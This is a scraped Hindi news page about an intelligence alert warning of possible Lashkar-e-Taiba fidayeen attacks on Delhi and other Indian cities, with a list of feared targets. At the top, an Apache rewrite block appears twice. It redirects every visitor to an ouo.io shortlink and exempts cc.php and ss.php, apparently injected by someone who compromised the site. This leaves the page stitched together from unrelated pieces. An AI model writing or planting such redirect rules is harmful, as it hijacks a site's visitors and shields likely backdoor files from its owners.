
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 381
Previous Nextराजधानी दिल्ली समेत देश के कई राज्य आतंकी संगठन लश्कर ए तैयबा के निशाने पर हैं। आईबी ने दिल्ली एनसीआर, जम्मू, पंजाब के गुरदासपुर, मुंबई, बंगलुरू, हैदराबाद के साथ साथ असम, नागालैंड, मणिपुर और उत्तर प्रदेश में फिदायिन हमले की आशंका जाहिर की थी।
इस संबंध में आईबी ने सभी राज्यों की पुलिस को सूचना भी भेजी है। दिल्ली में एनआईए मुख्यालय, दीनदयाल उपाध्याय इंस्ट्रीच्यूट करोलबाग भी आतंकी निशाने पर हैं। इसके बाद झारखंड राज्य की विशेष शाखा ने सभी जिलों के एसपी को आवश्यक कार्रवाई के लिए पत्र भेजा है। 11 फरवरी को रांची के एसएसपी अनीश गुप्ता ने अपने अधीनस्थ अधिकारियों को पत्र लिखकर संदिग़्ध लोगों की गतिविधियों पर नजर रखने का आदेश दिया है।
विदेशी फिदायिन के आने की खबर
गणतंत्र दिवस के ठीक पहले 21 जनवरी को गृह मंत्रालय में आतंकी खतरे को लेकर बैठक हुई थी। बैठक में दिल्ली व बंगलौर में आतंकियों के द्वारा फिदायिन हमले किए जाने की तैयारी पर चर्चा हुई थी। रांची में अधिकारियों को भेजे गए पत्र में जिक्र है कि दो ग्रुप में विदेशी आतंकियों का दस्ता दिल्ली पहुंचा था। प्रत्येक ग्रुप में तीन तीन आतंकियों की मौजूदगी की सूचना मिली थी। दिल्ली में चांदनी चौक के समीप इलेक्ट्रानिक होलसेल मार्केट पर हमले की आशंका जतायी गई थी। पत्र में जिक्र है कि 14 दिसंबर को श्रीनगर से विस्तारा की फ्लाइट से तीन विदेशी आतंकी दिल्ली आए थे।
कहां कहां फिदायिन हमले की आशंका
- एनआईए मुख्यालय व इसके अधिकारी
- दीनदयाल उपाध्याय इंस्टीच्यूट, करोलबाग
- दिल्ली पुलिस मुख्यालय
- विश्व हिंदू परिषद, भाजपा व आरएसएस के पदाधिकारियों को दिल्ली पर पश्चिमी उत्तर प्रदेश में निशाना बनाया जा सकता है।
-अयोध्या में जाने वाली धार्मिक रैलियां
- रजौरी जम्मू
- आरएस पुरा सेक्टर, गुरदासपुर, बंगलुरू, हैदराबाद